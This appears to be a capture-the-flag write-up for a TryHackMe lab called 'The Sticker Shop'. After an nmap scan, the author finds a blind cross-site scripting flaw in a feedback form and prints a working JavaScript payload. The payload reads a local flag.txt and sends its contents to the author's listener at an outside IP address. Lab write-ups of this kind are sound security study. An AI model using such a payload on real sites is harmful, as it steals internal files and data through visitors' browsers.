Can you exploit the sticker shop in order to capture the flag?
Intro.
Hello Everyone hope you doing great. Today we have a new try hack me machine. Let's get right into it.
Enumeration.
Port scanning.
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b2:54:8c:e2:d7:67:ab:8f:90:b3:6f:52:c2:73:37:69 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDZ5yrbM4EUF9kvSfSmVTdRWGVeqTTpQpwFopgW7iFN3f/I3mBWiJpAGL8Q8rEs7n8ESeN0yRcr1lGSuUtRqk5Mwei9edFIAGFC0uEJMnO7EQl/3O8PAlTGeuIaEg+YItzpmXOIWfslh0oftoQNN0iWouJFj7DU5QtoiuwK9GIDwD54aaJ6QQHu16nYYk0fTmA2szzSy0nL0fG1I+ILOnVf1SEyDu5a+uHSKA4lERXWsJ6KDhEtxAuf1+uk8x33I4ERJQsGEZ/GbFJsPxbWhFgyvRE9cScm+YpeppPBMwbvicnEg+MZLuDfXAzYCsDvXPem8io/8QlqHXAyTb/hfw8twUiLuWRHPuHH6E4tq+cztlD/BsfydBn+72TEB7dZnRnWP4tAnI5au2KiPA1RA3ud3JNn7Ha7iU0AA5MK9gKhSv/S5tDyLhFbAcLm8ByWzdJ1R5F8NIlWG8C9VDgDuixmIQwsV4D7FthMTsDaM5PuJHr5GDOfT56Mn3fGxQT2W4k=
| 256 14:29:ec:36:95:e5:64:49:39:3f:b4:ec:ca:5f:ee:78 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKVWb4NfXmP4f5RQIvXlrggi/9cDARgYazfJpJFlRhH/Ypg/QO6JQ0cj+BInTq4qjv9q5f1ksX0KLJxT2sc95WI=
| 256 19:eb:1f:c9:67:92:01:61:0c:14:fe:71:4b:0d:50:40 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHQ5WIN3vZO9KIDXb+PpV5yqA3SVieIqn8jSOGdjDHm1
8080/tcp open http-proxy syn-ack ttl 63 Werkzeug/3.0.1 Python/3.8.10
|_http-title: Cat Sticker Shop
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Server: Werkzeug/3.0.1 Python/3.8.10
| Date: Sat, 30 Nov 2024 09:36:07 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 1655
| Connection: close
| <!DOCTYPE html>
| <html>
| <head>
| <title>Cat Sticker Shop</title>
| <style>
| body {
| font-family: Arial, sans-serif;
| margin: 0;
| padding: 0;
| header {
| background-color: #333;
| color: #fff;
| text-align: center;
| padding: 10px;
| header ul {
| list-style: none;
| padding: 0;
| header li {
| display: inline;
| margin-right: 20px;
| header a {
| text-decoration: none;
| color: #fff;
| font-weight: bold;
| .content {
| padding: 20px;
|_ .product {
| http-methods:
|_ Supported Methods: HEAD GET OPTIONS
|_http-server-header: Werkzeug/3.0.1 Python/3.8.10
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.c
So out main object is to access the flag when we attempt to access it we get 401 Unauthorized status code so let's see how we can get around that.
I tried the following methods.
HTTP Verbs/Methods Fuzzing
HTTP Headers Fuzzing
Path Fuzzing
None of them works because i was not looking at the right direction.
XSS.
If we brows the web for a bit we going to find a feedback form.
The first thing comes to my mind is to try blind XSS.
and as you can see we indeed have blind xss.
So, Now how can we access the flag.txt file.
Craft a payload.
I will not bother you of how many attpets i did but i tried a punch of scripts.
and this is the one.
<script>
let s = "i DID not change";
fetch("http://127.0.0.1:8080/flag.txt")
.then(res => {
if (!res.ok) {
fetch("http://10.11.96.110:8005?data=" + res.status);
}
return res.text();
})
.then(data => {
s = data;
fetch("http://10.11.96.110:8005?data=" + s);
})
.catch(err => {
console.error("Error fetching the file:", err);
fetch("http://10.11.96.110:8005?data=" + encodeURIComponent(err.message));
});
</script>
Here i attempts first to access the URL as it is but no luck, i got this error.
And then i tried using localhost instead of the IP. Also no luck.
Finally i used 127.0.0.1 which is the one.
Conclusion.
As for using XSS to bypass 401 or read files by general this was my first time i take it step by step and i got it at the end a fun machine it only has a single goal and it did it really well.
